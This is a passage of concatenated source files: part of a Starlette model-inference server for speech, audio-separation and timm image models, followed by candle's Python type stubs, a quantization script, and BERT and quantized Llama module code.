98
+ (speech, rate) = librosa.load(tmp.name, sr=16000)
99
+ except Exception as exc:
100
+ return JSONResponse({'ok': False, 'message': f'Invalid audio: {exc}'}, status_code=400)
101
+ if len(speech.shape) > 1:
102
+ speech = speech[:, 0]
103
+ if rate != 16000:
104
+ speech = librosa.resample(speech, rate, 16000)
105
+ if model_id in ASR_HF_MODELS:
106
+ if model_id in SPEECH_TO_TEXT_MODEL_IDS:
107
+ (model, processor) = ASR_HF_MODELS.get(model_id)
108
+ inputs = processor(speech, return_tensors='pt')
109
+ generated_ids = model.generate(input_ids=inputs['features'], attention_mask=inputs['attention_mask'])
110
+ text = processor.batch_decode(generated_ids, skip_special_tokens=True)[0]
111
+ else:
112
+ (model, tokenizer) = ASR_HF_MODELS.get(model_id)
113
+ input_values = tokenizer(speech, return_tensors='pt').input_values
114
+ logits = model(input_values).logits
115
+ predicted_ids = torch.argmax(logits, dim=-1)
116
+ text = tokenizer.decode(predicted_ids[0])
117
+ else:
118
+ model = ASR_MODELS.get(model_id)
119
+ outputs = model(speech)
120
+ (text, *_) = outputs[0]
121
+ print(text)
122
+ return JSONResponse({'text': text}, headers={HF_HEADER_COMPUTE_TIME: '{:.3f}'.format(time.time() - start)})
123
+
124
+ async def post_inference_sep(request: Request, model: AnyModel):
125
+ start = time.time()
126
+ try:
127
+ body = await request.body()
128
+ with tempfile.NamedTemporaryFile() as tmp:
129
+ tmp.write(body)
130
+ tmp.flush()
131
+ (wav, fs) = separate._load_audio(tmp.name)
132
+ except Exception as exc:
133
+ return JSONResponse({'ok': False, 'message': f'Invalid body: {exc}'}, status_code=400)
134
+ wav = separate._resample(wav[:, 0], orig_sr=fs, target_sr=int(model.sample_rate))
135
+ (est_srcs,) = separate.numpy_separate(model, wav.reshape((1, 1, -1)))
136
+ est = est_srcs[0]
137
+ with tempfile.NamedTemporaryFile(suffix='.wav', delete=False) as tmp:
138
+ soundfile.write(tmp.name, est, int(model.sample_rate), 'PCM_16')
139
+ return FileResponse(tmp.name, headers={HF_HEADER_COMPUTE_TIME: '{:.3f}'.format(time.time() - start)}, background=BackgroundTask(lambda f: os.unlink(f), tmp.name))
140
+
141
+ async def post_inference_timm(request: Request, model: torch.nn.Module):
142
+ start = time.time()
143
+ content_type = request.headers['content-type']
144
+ if content_type == 'application/json':
145
+ body = await request.json()
146
+ if 'url' not in body:
147
+ return JSONResponse({'ok': False, 'message': f'Invalid json, no url key'}, status_code=400)
148
+ url = body['url']
149
+ img = Image.open(requests.get(url, stream=True).raw)
150
+ else:
151
+ try:
152
+ body = await request.body()
153
+ img = Image.open(BytesIO(body))
154
+ except Exception as exc:
155
+ print(exc)
156
+ return JSONResponse({'ok': False, 'message': f'Unable to open image from request'}, status_code=400)
157
+ img = img.convert('RGB')
158
+ config = model.default_cfg
159
+ if isinstance(config['input_size'], tuple):
160
+ img_size = config['input_size'][-2:]
161
+ else:
162
+ img_size = config['input_size']
163
+ transform = timm.data.transforms_factory.transforms_imagenet_eval(img_size=img_size, interpolation=config['interpolation'], mean=config['mean'], std=config['std'])
164
+ input_tensor = transform(img)
165
+ input_tensor = input_tensor.unsqueeze(0)
166
+ with torch.no_grad():
167
+ output = model(input_tensor)
168
+ probs = output.squeeze(0).softmax(dim=0)
169
+ (values, indices) = torch.topk(probs, k=5)
170
+ labels = [IMAGENET_LABELS[i] for i in indices]
171
+ return JSONResponse([{'label': label, 'score': float(values[i])} for (i, label) in enumerate(labels)], headers={HF_HEADER_COMPUTE_TIME: '{:.3f}'.format(time.time() - start)})
172
+
173
+ async def post_inference(request: Request) -> JSONResponse:
174
+ model_id = request.path_params['model_id']
175
+ if model_id in TTS_MODELS:
176
+ model = TTS_MODELS.get(model_id)
177
+ return await post_inference_tts(request, model)
178
+ if model_id in ASR_MODELS or model_id in ASR_HF_MODELS:
179
+ return await post_inference_asr(request, model_id)
180
+ if model_id in SEP_MODELS:
181
+ model = SEP_MODELS.get(model_id)
182
+ return await post_inference_sep(request, model)
183
+ if model_id in TIMM_MODELS:
184
+ model = TIMM_MODELS.get(model_id)
185
+ return await post_inference_timm(request, model)
186
+ return JSONResponse(status_code=404, content='Unknown or unsupported model')
187
+ routes = [Route('/', home), Route('/health', health), Route('/models', list_models), Route('/models/{model_id:path}', post_inference, methods=['POST'])]
188
+ middlewares = [Middleware(CORSMiddleware, allow_origins=['*'], allow_methods=['*'], allow_headers=['*'], expose_headers=['*'])]
189
+ app = Starlette(debug=True, routes=routes, middleware=middlewares)
190
+ if __name__ == '__main__':
191
+ start_time = time.time()
192
+ for model_id in (EXAMPLE_TTS_EN_MODEL_ID, EXAMPLE_TTS_ZH_MODEL_ID):
193
+ model = Text2Speech.from_pretrained(model_id, device='cpu')
194
+ TTS_MODELS[model_id] = model
195
+ for model_id in (EXAMPLE_ASR_EN_MODEL_ID,):
196
+ model = Speech2Text.from_pretrained(model_id, device='cpu')
197
+ ASR_MODELS[model_id] = model
198
+ for model_id in (EXAMPLE_SEP_ENH_MODEL_ID, EXAMPLE_SEP_SEP_MODEL_ID):
199
+ model = AsteroidBaseModel.from_pretrained(model_id)
200
+ SEP_MODELS[model_id] = model
201
+ for model_id in WAV2VEV2_MODEL_IDS:
202
+ model = Wav2Vec2ForCTC.from_pretrained(model_id)
203
+ tokenizer = Wav2Vec2Tokenizer.from_pretrained(model_id)
204
+ ASR_HF_MODELS[model_id] = (model, tokenizer)
205
+ for model_id in SPEECH_TO_TEXT_MODEL_IDS:
206
+ model = Speech2TextForConditionalGeneration.from_pretrained(model_id)
207
+ processor = Speech2TextProcessor.from_pretrained(model_id)
208
+ ASR_HF_MODELS[model_id] = (model, processor)
209
+ TIMM_MODELS['julien-c/timm-dpn92'] = timm.create_model('dpn92', pretrained=True).eval()
210
+ TIMM_MODELS['sgugger/resnet50d'] = timm.create_model('resnet50d', pretrained=True).eval()
211
+ print('models.loaded', time.time() - start_time)
212
+ uvicorn.run(app, host='0.0.0.0', port=8000, timeout_keep_alive=0)
213
+
huggingface_autotrain-advanced.txt ADDED
The diff for this file is too large to render. See raw diff
 
huggingface_candle.txt ADDED
@@ -0,0 +1,1540 @@
1
+ # File: candle-main/candle-pyo3/_additional_typing/__init__.py
2
+ from typing import Union, Sequence
3
+
4
+ class Tensor:
5
+
6
+ def __add__(self, rhs: Union['Tensor', 'Scalar']) -> 'Tensor':
7
+ pass
8
+
9
+ def __radd__(self, rhs: Union['Tensor', 'Scalar']) -> 'Tensor':
10
+ pass
11
+
12
+ def __sub__(self, rhs: Union['Tensor', 'Scalar']) -> 'Tensor':
13
+ pass
14
+
15
+ def __truediv__(self, rhs: Union['Tensor', 'Scalar']) -> 'Tensor':
16
+ pass
17
+
18
+ def __mul__(self, rhs: Union['Tensor', 'Scalar']) -> 'Tensor':
19
+ pass
20
+
21
+ def __rmul__(self, rhs: Union['Tensor', 'Scalar']) -> 'Tensor':
22
+ pass
23
+
24
+ def __richcmp__(self, rhs: Union['Tensor', 'Scalar'], op) -> 'Tensor':
25
+ pass
26
+
27
+ def __getitem__(self, index: Union['Index', 'Tensor', Sequence['Index']]) -> 'Tensor':
28
+ pass
29
+
30
+ def __eq__(self, rhs: Union['Tensor', 'Scalar']) -> 'Tensor':
31
+ pass
32
+
33
+ def __ne__(self, rhs: Union['Tensor', 'Scalar']) -> 'Tensor':
34
+ pass
35
+
36
+ def __lt__(self, rhs: Union['Tensor', 'Scalar']) -> 'Tensor':
37
+ pass
38
+
39
+ def __le__(self, rhs: Union['Tensor', 'Scalar']) -> 'Tensor':
40
+ pass
41
+
42
+ def __gt__(self, rhs: Union['Tensor', 'Scalar']) -> 'Tensor':
43
+ pass
44
+
45
+ def __ge__(self, rhs: Union['Tensor', 'Scalar']) -> 'Tensor':
46
+ pass
47
+
48
+ # File: candle-main/candle-pyo3/e5.py
49
+ from candle.utils import load_safetensors, save_gguf, load_gguf
50
+ from candle.models.bert import BertModel, Config
51
+ import json
52
+ from candle import Tensor
53
+ from tqdm import tqdm
54
+ from dataclasses import fields
55
+ import os
56
+ import time
57
+ from huggingface_hub import hf_hub_download
58
+ from transformers import BertTokenizer, AutoModel
59
+ import torch
60
+ if __name__ == '__main__':
61
+ model_name = 'intfloat/e5-small-v2'
62
+ model_file = hf_hub_download(repo_id=model_name, filename='model.safetensors')
63
+ config_file = hf_hub_download(repo_id=model_name, filename='config.json')
64
+ tensors = load_safetensors(model_file)
65
+ config = Config()
66
+ with open(config_file, 'r') as f:
67
+ raw_config = json.load(f)
68
+ for field in fields(config):
69
+ if field.name in raw_config:
70
+ setattr(config, field.name, raw_config[field.name])
71
+ model = BertModel(config)
72
+ model.load_state_dict(tensors)
73
+ hf_model = AutoModel.from_pretrained(model_name)
74
+ tokenizer = BertTokenizer.from_pretrained(model_name)
75
+ sentences = ['The cat sits outside', 'A man is playing guitar', 'I love pasta', 'The new movie is awesome', 'The cat plays in the garden', 'A woman watches TV', 'The new movie is so great', 'Do you like pizza?']
76
+
77
+ def average_pool(last_hidden_states: torch.Tensor, attention_mask: torch.Tensor):
78
+ last_hidden = last_hidden_states.masked_fill(~attention_mask[..., None].bool(), 0.0)
79
+ return last_hidden.sum(dim=1) / attention_mask.sum(dim=1)[..., None]
80
+ tokenized = tokenizer(sentences, padding=True)
81
+ tokens = Tensor(tokenized['input_ids'])
82
+ token_type_ids = Tensor(tokenized['token_type_ids'])
83
+ attention_mask = Tensor(tokenized['attention_mask'])
84
+ (encoder_out, _) = model.forward(tokens, token_type_ids, attention_mask=attention_mask)
85
+ hf_tokenized = tokenizer(sentences, padding=True, return_tensors='pt')
86
+ hf_result = hf_model(**hf_tokenized)['last_hidden_state']
87
+ hf_pooled = average_pool(hf_result, hf_tokenized['attention_mask'])
88
+ candle_pooled = average_pool(torch.tensor(encoder_out.values()), hf_tokenized['attention_mask'])
89
+ loss = torch.nn.L1Loss()
90
+ error = loss(hf_pooled, candle_pooled).mean().item()
91
+ print(f'Mean error between torch-reference and candle: {error}')
92
+ quantized_tensors = {}
93
+ for (name, tensor) in tqdm(tensors.items(), desc='Quantizing tensors to 5-Bit'):
94
+ if name.endswith('weight') and ('attention' in name or 'intermediate' in name or 'output' in name):
95
+ if tensor.shape[-1] % 256 == 0:
96
+ new_tensor = tensor.quantize('q4k')
97
+ else:
98
+ new_tensor = tensor.quantize('q5_0')
99
+ quantized_tensors[name] = new_tensor
100
+ else:
101
+ quantized_tensors[name] = tensor.quantize('q8_0')
102
+ print(f'Saving quantized tensors')
103
+ config_to_save = {k: v for (k, v) in config.__dict__.items() if v is not None}
104
+ quantized_model_file = 'e5_small.gguf'
105
+ save_gguf(quantized_model_file, quantized_tensors, config_to_save)
106
+ file_size_mb = os.path.getsize(model_file) / 1024 / 1024
107
+ file_size_mb_compressed = os.path.getsize(quantized_model_file) / 1024 / 1024
108
+ print(f'Compressed model from {file_size_mb:.2f} MB to {file_size_mb_compressed:.2f} MB')
109
+ (tensors, raw_config) = load_gguf(quantized_model_file)
110
+ config = Config()
111
+ for field in fields(config):
112
+ if field.name in raw_config:
113
+ setattr(config, field.name, raw_config[field.name])
114
+ model = BertModel(config)
115
+ model.load_state_dict(tensors, strict=False)
116
+ (encoder_out_2, pooled_output_2) = model.forward(tokens, token_type_ids)
117
+ (encoder_out_2, pooled_output_2) = (encoder_out_2.to_device('cpu'), pooled_output_2.to_device('cpu'))
118
+ candle_pooled_2 = average_pool(torch.tensor(encoder_out_2.values()), hf_tokenized['attention_mask'])
119
+ error = loss(hf_pooled, candle_pooled_2).mean().item()
120
+ print(f'Mean error between torch-reference and quantized-candle: {error}')
121
+
122
+ # File: candle-main/candle-pyo3/py_src/candle/__init__.py
123
+ import logging
124
+ try:
125
+ from .candle import *
126
+ except ImportError as e:
127
+ logging.warning('DLLs were not bundled with this package. Trying to locate them...')
128
+ import os
129
+ import platform
130
+
131
+ def locate_cuda_dlls():
132
+ logging.warning('Locating CUDA DLLs...')
133
+ cuda_path = os.environ.get('CUDA_PATH', None)
134
+ if cuda_path:
135
+ logging.warning(f'Found CUDA_PATH environment variable: {cuda_path}')
136
+ if platform.system() == 'Windows':
137
+ cuda_path = os.path.join(cuda_path, 'bin')
138
+ else:
139
+ cuda_path = os.path.join(cuda_path, 'lib64')
140
+ logging.warning(f'Adding {cuda_path} to DLL search path...')
141
+ os.add_dll_directory(cuda_path)
142
+ else:
143
+ logging.warning('CUDA_PATH environment variable not found!')
144
+
145
+ def locate_mkl_dlls():
146
+ oneapi_root = os.environ.get('ONEAPI_ROOT', None)
147
+ if oneapi_root:
148
+ if platform.system() == 'Windows':
149
+ mkl_path = os.path.join(oneapi_root, 'compiler', 'latest', 'windows', 'redist', 'intel64_win', 'compiler')
150
+ else:
151
+ mkl_path = os.path.join(oneapi_root, 'mkl', 'latest', 'lib', 'intel64')
152
+ logging.warning(f'Adding {mkl_path} to DLL search path...')
153
+ os.add_dll_directory(mkl_path)
154
+ else:
155
+ logging.warning('ONEAPI_ROOT environment variable not found!')
156
+ locate_cuda_dlls()
157
+ locate_mkl_dlls()
158
+ try:
159
+ from .candle import *
160
+ except ImportError as inner_e:
161
+ raise ImportError('Could not locate DLLs. Please check the documentation for more information.')
162
+ __doc__ = candle.__doc__
163
+ if hasattr(candle, '__all__'):
164
+ __all__ = candle.__all__
165
+
166
+ # File: candle-main/candle-pyo3/py_src/candle/models/bert.py
167
+ from dataclasses import dataclass
168
+ from typing import Optional
169
+ from candle.nn import Module, Embedding, LayerNorm, Linear, ModuleList
170
+ from candle import Tensor
171
+ import candle
172
+ import candle.functional as F
173
+ from typing import Tuple, Optional
174
+
175
+ @dataclass
176
+ class Config:
177
+ vocab_size: int = 30522
178
+ hidden_size: int = 768
179
+ num_hidden_layers: int = 12
180
+ num_attention_heads: int = 12
181
+ intermediate_size: int = 3072
182
+ hidden_act: str = 'gelu'
183
+ hidden_dropout_prob: float = 0.1
184
+ max_position_embeddings: int = 512
185
+ type_vocab_size: int = 2
186
+ initializer_range: float = 0.02
187
+ layer_norm_eps: float = 1e-12
188
+ pad_token_id: int = 0
189
+ position_embedding_type: str = 'absolute'
190
+ use_cache: bool = True
191
+ classifier_dropout: Optional[float] = None
192
+ model_type: Optional[str] = 'bert'
193
+
194
+ class BertSelfAttention(Module):
195
+
196
+ def __init__(self, config: Config) -> None:
197
+ super().__init__()
198
+ self.num_attention_heads = config.num_attention_heads
199
+ self.attention_head_size = int(config.hidden_size / self.num_attention_heads)
200
+ all_head_size = int(config.num_attention_heads * self.attention_head_size)
201
+ hidden_size = config.hidden_size
202
+ self.query = Linear(hidden_size, all_head_size)
203
+ self.key = Linear(hidden_size, all_head_size)
204
+ self.value = Linear(hidden_size, all_head_size)
205
+
206
+ def transpose_for_scores(self, x: Tensor) -> Tensor:
207
+ new_x_shape = x.shape[:-1] + (self.num_attention_heads, self.attention_head_size)
208
+ x = x.reshape(new_x_shape).transpose(1, 2)
209
+ return x.contiguous()
210
+
211
+ def forward(self, hidden_states: Tensor, attention_mask=None) -> Tensor:
212
+ query = self.query.forward(hidden_states)
213
+ key = self.key.forward(hidden_states)
214
+ value = self.value.forward(hidden_states)
215
+ query = self.transpose_for_scores(query)
216
+ key = self.transpose_for_scores(key)
217
+ value = self.transpose_for_scores(value)
218
+ attention_scores = query.matmul(key.t())
219
+ attention_scores = attention_scores / float(self.attention_head_size) ** 0.5
220
+ if attention_mask is not None:
221
+ (b_size, _, _, last_dim) = attention_scores.shape
222
+ attention_scores = attention_scores.broadcast_add(attention_mask.reshape((b_size, 1, 1, last_dim)))
223
+ attention_probs = F.softmax(attention_scores, dim=-1)
224
+ context_layer = attention_probs.matmul(value)
225
+ context_layer = context_layer.transpose(1, 2).contiguous()
226
+ context_layer = context_layer.flatten_from(-2)
227
+ return context_layer
228
+
229
+ class BertSelfOutput(Module):
230
+
231
+ def __init__(self, config: Config) -> None:
232
+ super().__init__()
233
+ self.dense = Linear(config.hidden_size, config.hidden_size)
234
+ self.LayerNorm = LayerNorm(config.hidden_size, eps=config.layer_norm_eps)
235
+
236
+ def forward(self, hidden_states: Tensor, input_tensor: Tensor) -> Tensor:
237
+ hidden_states = self.dense.forward(hidden_states)
238
+ return self.LayerNorm.forward(hidden_states + input_tensor)
239
+
240
+ class BertAttention(Module):
241
+
242
+ def __init__(self, config: Config) -> None:
243
+ super().__init__()
244
+ self.self = BertSelfAttention(config)
245
+ self.output = BertSelfOutput(config)
246
+
247
+ def forward(self, hidden_states: Tensor, attention_mask: None) -> Tensor:
248
+ self_outputs = self.self.forward(hidden_states, attention_mask=attention_mask)
249
+ attention_output = self.output.forward(self_outputs, hidden_states)
250
+ return attention_output
251
+
252
+ class BertIntermediate(Module):
253
+
254
+ def __init__(self, config: Config) -> None:
255
+ super().__init__()
256
+ self.dense = Linear(config.hidden_size, config.intermediate_size)
257
+ self.act = F.gelu if config.hidden_act == 'gelu' else F.relu
258
+
259
+ def forward(self, hidden_states: Tensor) -> Tensor:
260
+ hidden_states = self.dense.forward(hidden_states)
261
+ return self.act(hidden_states)
262
+
263
+ class BertOutput(Module):
264
+
265
+ def __init__(self, config: Config) -> None:
266
+ super().__init__()
267
+ self.dense = Linear(config.intermediate_size, config.hidden_size)
268
+ self.LayerNorm = LayerNorm(config.hidden_size, eps=config.layer_norm_eps)
269
+
270
+ def forward(self, hidden_states: Tensor, input_tensor: Tensor) -> Tensor:
271
+ hidden_states = self.dense.forward(hidden_states)
272
+ return self.LayerNorm.forward(hidden_states + input_tensor)
273
+
274
+ class BertLayer(Module):
275
+
276
+ def __init__(self, config: Config) -> None:
277
+ super().__init__()
278
+ self.attention = BertAttention(config)
279
+ self.intermediate = BertIntermediate(config)
280
+ self.output = BertOutput(config)
281
+
282
+ def forward(self, hidden_states: Tensor, attention_mask=None) -> Tensor:
283
+ attention_output = self.attention.forward(hidden_states, attention_mask=attention_mask)
284
+ intermediate_output = self.intermediate.forward(attention_output)
285
+ layer_output = self.output.forward(intermediate_output, attention_output)
286
+ return layer_output
287
+
288
+ class BertEncoder(Module):
289
+
290
+ def __init__(self, config: Config) -> None:
291
+ super().__init__()
292
+ self.layer = ModuleList()
293
+ for _ in range(config.num_hidden_layers):
294
+ self.layer.append(BertLayer(config))
295
+
296
+ def forward(self, hidden_states: Tensor, attention_mask=None) -> Tensor:
297
+ for l in self.layer:
298
+ hidden_states = l.forward(hidden_states, attention_mask=attention_mask)
299
+ return hidden_states
300
+
301
+ class BertEmbeddings(Module):
302
+
303
+ def __init__(self, config: Config) -> None:
304
+ super().__init__()
305
+ self.word_embeddings = Embedding(config.vocab_size, config.hidden_size)
306
+ self.position_embeddings = Embedding(config.max_position_embeddings, config.hidden_size)
307
+ self.token_type_embeddings = Embedding(config.type_vocab_size, config.hidden_size)
308
+ self.LayerNorm = LayerNorm(config.hidden_size, eps=config.layer_norm_eps)
309
+ self.position_ids = candle.Tensor(list(range(config.max_position_embeddings))).reshape((1, config.max_position_embeddings))
310
+
311
+ def forward(self, input_ids: Tensor, token_type_ids: Tensor) -> Tensor:
312
+ (_batch_size, seq_len) = input_ids.shape
313
+ input_embeddings = self.word_embeddings.forward(input_ids)
314
+ token_type_embeddings = self.token_type_embeddings.forward(token_type_ids)
315
+ embeddings: Tensor = input_embeddings + token_type_embeddings
316
+ position_ids = list(range(seq_len))
317
+ position_ids = Tensor(position_ids).to_dtype(input_ids.dtype).to_device(input_ids.device)
318
+ embeddings = embeddings.broadcast_add(self.position_embeddings.forward(position_ids))
319
+ embeddings = self.LayerNorm(embeddings)
320
+ return embeddings
321
+
322
+ class BertPooler(Module):
323
+
324
+ def __init__(self, config: Config) -> None:
325
+ super().__init__()
326
+ self.dense = Linear(config.hidden_size, config.hidden_size)
327
+ self.activation = F.tanh
328
+
329
+ def forward(self, hidden_states: Tensor) -> Tensor:
330
+ first_token_tensor = hidden_states[:, 0]
331
+ pooled_output = self.dense.forward(first_token_tensor)
332
+ pooled_output = self.activation(pooled_output)
333
+ return pooled_output
334
+
335
+ def masked_fill(on_false: float, mask: Tensor, on_true: float):
336
+ shape = mask.shape
337
+ on_true = candle.tensor(on_true).broadcast_as(shape)
338
+ on_false = candle.tensor(on_false).broadcast_as(shape)
339
+ return mask.where_cond(on_true, on_false)
340
+
341
+ class BertModel(Module):
342
+
343
+ def __init__(self, config: Config, add_pooling_layer=True) -> None:
344
+ super().__init__()
345
+ self.config = config
346
+ self.embeddings = BertEmbeddings(config)
347
+ self.encoder = BertEncoder(config)
348
+ self.pooler = BertPooler(config) if add_pooling_layer else None
349
+
350
+ def forward(self, input_ids: Tensor, token_type_ids: Tensor, attention_mask=None) -> Tuple[Tensor, Optional[Tensor]]:
351
+ if attention_mask is not None:
352
+ attention_mask = masked_fill(float('-inf'), attention_mask, 1.0)
353
+ embeddings = self.embeddings.forward(input_ids, token_type_ids)
354
+ encoder_out = self.encoder.forward(embeddings, attention_mask=attention_mask)
355
+ pooled_output = self.pooler(encoder_out) if self.pooler is not None else None
356
+ return (encoder_out, pooled_output)
357
+
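A minimal usage sketch for the BertModel above, assuming the Config dataclass defined earlier in this file provides workable defaults and that integer ids are expected as u32 tensors; the token ids below are made-up placeholders.

config = Config()                                                     # hypothetical: relies on Config's default hyper-parameters
model = BertModel(config)
input_ids = candle.Tensor([[101, 2023, 2003, 102]]).to_dtype('u32')  # assumed index dtype
token_type_ids = candle.Tensor([[0, 0, 0, 0]]).to_dtype('u32')
encoder_out, pooled_output = model.forward(input_ids, token_type_ids)
print(encoder_out.shape)                                              # (1, 4, config.hidden_size)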
358
+ # File: candle-main/candle-pyo3/py_src/candle/models/llama.py
359
+ import candle
360
+ from typing import Dict, Tuple, Any
361
+ from candle import Tensor, QTensor, utils, nn
362
+ from candle.nn import Module, ModuleList
363
+
364
+ def masked_fill(on_false: Tensor, mask: Tensor, on_true: Tensor):
365
+ shape = mask.shape
366
+ on_true = candle.tensor(on_true).broadcast_as(shape)
367
+ return mask.where_cond(on_true, on_false)
368
+
369
+ def precompute_freqs_cis(hparams: Dict[str, Any], freq_base: float, max_seq_len: int):
370
+ head_dim = hparams['n_embd'] // hparams['n_head']
371
+ theta = [1.0 / freq_base ** (i / head_dim) for i in range(0, head_dim, 2)]
372
+ theta = candle.tensor(theta)
373
+ idx_theta = [float(i) for i in range(max_seq_len)]
374
+ idx_theta = candle.tensor(idx_theta).reshape((max_seq_len, 1))
375
+ m = idx_theta.matmul(theta.unsqueeze(0))
376
+ return (m.cos(), m.sin())
377
+
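For reference, precompute_freqs_cis above builds the usual rotary-embedding tables: theta_k = freq_base^(-2k / head_dim) for k = 0 .. head_dim/2 - 1, and the returned pair holds cos(p * theta_k) and sin(p * theta_k) for every position p < max_seq_len, each of shape (max_seq_len, head_dim // 2).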
378
+ class RmsNorm(Module):
379
+
380
+ def __init__(self, qtensor: QTensor):
381
+ super().__init__()
382
+ self.weight = qtensor.dequantize()
383
+
384
+ def forward(self, x: Tensor) -> Tensor:
385
+ (b_size, seq_len, hidden_size) = x.shape
386
+ norm_x = x.sqr().sum_keepdim(2) / hidden_size
387
+ x_normed = x.broadcast_div((norm_x + 1e-05).sqrt())
388
+ return x_normed.broadcast_mul(self.weight)
389
+
390
+ class QuantizedLayer(Module):
391
+
392
+ def __init__(self, layer_idx: int, hparams: Dict[str, Any], all_tensors: Dict[str, QTensor], cos_sin: Tuple[Tensor, Tensor]):
393
+ super().__init__()
394
+ p = f'layers.{layer_idx}'
395
+ self.attention_wq = all_tensors[f'{p}.attention.wq.weight']
396
+ self.attention_wk = all_tensors[f'{p}.attention.wk.weight']
397
+ self.attention_wv = all_tensors[f'{p}.attention.wv.weight']
398
+ self.attention_wo = all_tensors[f'{p}.attention.wo.weight']
399
+ self.ffw1 = all_tensors[f'{p}.feed_forward.w1.weight']
400
+ self.ffw2 = all_tensors[f'{p}.feed_forward.w2.weight']
401
+ self.ffw3 = all_tensors[f'{p}.feed_forward.w3.weight']
402
+ self.attn_norm = RmsNorm(all_tensors[f'{p}.attention_norm.weight'])
403
+ self.ffn_norm = RmsNorm(all_tensors[f'{p}.ffn_norm.weight'])
404
+ self.n_head = hparams['n_head']
405
+ self.n_kv_head = self.n_head
406
+ self.head_dim = hparams['n_embd'] // self.n_head
407
+ self.kv_cache = None
408
+ self.cos = cos_sin[0]
409
+ self.sin = cos_sin[1]
410
+ self._non_persistent_buffers_set.add('cos')
411
+ self._non_persistent_buffers_set.add('sin')
412
+
413
+ def forward(self, x: Tensor, mask: Tensor, index_pos: int) -> Tensor:
414
+ residual = x
415
+ x = self.attn_norm(x)
416
+ attn = self.forward_attn(x, mask, index_pos)
417
+ x = attn + residual
418
+ residual = x
419
+ x = self.ffn_norm(x)
420
+ w1 = self.ffw1.matmul_t(x)
421
+ w3 = self.ffw3.matmul_t(x)
422
+ mlp = self.ffw2.matmul_t(nn.silu(w1) * w3)
423
+ return mlp + residual
424
+
425
+ def forward_attn(self, x: Tensor, mask: Tensor, index_pos: int):
426
+ (b_size, seq_len, n_embd) = x.shape
427
+ q = self.attention_wq.matmul_t(x)
428
+ k = self.attention_wk.matmul_t(x)
429
+ v = self.attention_wv.matmul_t(x)
430
+ q = q.reshape((b_size, seq_len, self.n_head, self.head_dim)).transpose(1, 2)
431
+ k = k.reshape((b_size, seq_len, self.n_kv_head, self.head_dim)).transpose(1, 2)
432
+ v = v.reshape((b_size, seq_len, self.n_kv_head, self.head_dim)).transpose(1, 2)
433
+ q = self.apply_rotary_emb(q, index_pos)
434
+ k = self.apply_rotary_emb(k, index_pos)
435
+ if self.kv_cache is not None and index_pos > 0:
436
+ (prev_k, prev_v) = self.kv_cache
437
+ k = candle.cat([prev_k, k], 2).contiguous()
438
+ v = candle.cat([prev_v, v], 2).contiguous()
439
+ self.kv_cache = (k, v)
440
+ att = q.matmul(k.t()) / self.head_dim ** 0.5
441
+ mask = mask.broadcast_as(att.shape)
442
+ att = masked_fill(att, mask, float('-inf'))
443
+ att = nn.softmax(att, -1)
444
+ y = att.matmul(v.contiguous())
445
+ y = y.transpose(1, 2).reshape((b_size, seq_len, n_embd))
446
+ return self.attention_wo.matmul_t(y)
447
+
448
+ def apply_rotary_emb(self, x: Tensor, index_pos: int):
449
+ (b_size, n_head, seq_len, n_embd) = x.shape
450
+ cos = self.cos.narrow(0, index_pos, seq_len).reshape((seq_len, n_embd // 2, 1))
451
+ sin = self.sin.narrow(0, index_pos, seq_len).reshape((seq_len, n_embd // 2, 1))
452
+ x = x.reshape((b_size, n_head, seq_len, n_embd // 2, 2))
453
+ x0 = x.narrow(-1, 0, 1)
454
+ x1 = x.narrow(-1, 1, 1)
455
+ y0 = x0.broadcast_mul(cos) - x1.broadcast_mul(sin)
456
+ y1 = x0.broadcast_mul(sin) + x1.broadcast_mul(cos)
457
+ rope = candle.cat([y0, y1], -1)
458
+ return rope.flatten_from(-2)
459
+
460
+ class QuantizedLlama(Module):
461
+
462
+ def __init__(self, hparams: Dict[str, Any], all_tensors: Dict[str, QTensor]):
463
+ super().__init__()
464
+ self.tok_embeddings = all_tensors['tok_embeddings.weight'].dequantize()
465
+ self.norm = RmsNorm(all_tensors['norm.weight'])
466
+ self.output = all_tensors['output.weight']
467
+ self.layers = ModuleList()
468
+ rope_freq = hparams.get('rope_freq', 10000.0)
469
+ cos_sin = precompute_freqs_cis(hparams, rope_freq, hparams['context_length'])
470
+ for layer_idx in range(hparams['n_layer']):
471
+ layer = QuantizedLayer(layer_idx, hparams, all_tensors, cos_sin)
472
+ self.layers.append(layer)
473
+
474
+ def forward(self, token: Tensor, index_pos: int) -> Tensor:
475
+ (b_size, seq_len) = token.shape
476
+ (vocab_size, hidden_size) = self.tok_embeddings.shape
477
+ token = token.reshape((b_size * seq_len,))
478
+ x = self.tok_embeddings.index_select(token, 0)
479
+ x = x.reshape((b_size, seq_len, hidden_size))
480
+ mask = [int(j > i) for j in range(seq_len) for i in range(seq_len)]
481
+ mask = candle.tensor(mask).reshape((seq_len, seq_len))
482
+ for layer in self.layers:
483
+ x = layer(x, mask, index_pos)
484
+ x = self.norm(x)
485
+ x = x.narrow(1, -1, 1).squeeze(1)
486
+ x = self.output.matmul_t(x)
487
+ return x
488
+
489
+ # File: candle-main/candle-pyo3/py_src/candle/nn/container.py
490
+ from .module import Module
491
+ from typing import Any, Dict, Iterable, Iterator, Mapping, Optional, overload, Tuple, TypeVar, Union
492
+ from collections import OrderedDict, abc as container_abcs
493
+ import operator
494
+ from itertools import chain, islice
495
+ __all__ = ['Sequential', 'ModuleList', 'ModuleDict']
496
+ T = TypeVar('T', bound=Module)
497
+
498
+ def _addindent(s_: str, numSpaces: int):
499
+ s = s_.split('\n')
500
+ if len(s) == 1:
501
+ return s_
502
+ first = s.pop(0)
503
+ s = [numSpaces * ' ' + line for line in s]
504
+ s = '\n'.join(s)
505
+ s = first + '\n' + s
506
+ return s
507
+
508
+ class Sequential(Module):
509
+ _modules: Dict[str, Module]
510
+
511
+ @overload
512
+ def __init__(self, *args: Module) -> None:
513
+ ...
514
+
515
+ @overload
516
+ def __init__(self, arg: 'OrderedDict[str, Module]') -> None:
517
+ ...
518
+
519
+ def __init__(self, *args):
520
+ super().__init__()
521
+ if len(args) == 1 and isinstance(args[0], OrderedDict):
522
+ for (key, module) in args[0].items():
523
+ self.add_module(key, module)
524
+ else:
525
+ for (idx, module) in enumerate(args):
526
+ self.add_module(str(idx), module)
527
+
528
+ def _get_item_by_idx(self, iterator, idx) -> T:
529
+ size = len(self)
530
+ idx = operator.index(idx)
531
+ if not -size <= idx < size:
532
+ raise IndexError('index {} is out of range'.format(idx))
533
+ idx %= size
534
+ return next(islice(iterator, idx, None))
535
+
536
+ def __getitem__(self, idx: Union[slice, int]) -> Union['Sequential', T]:
537
+ if isinstance(idx, slice):
538
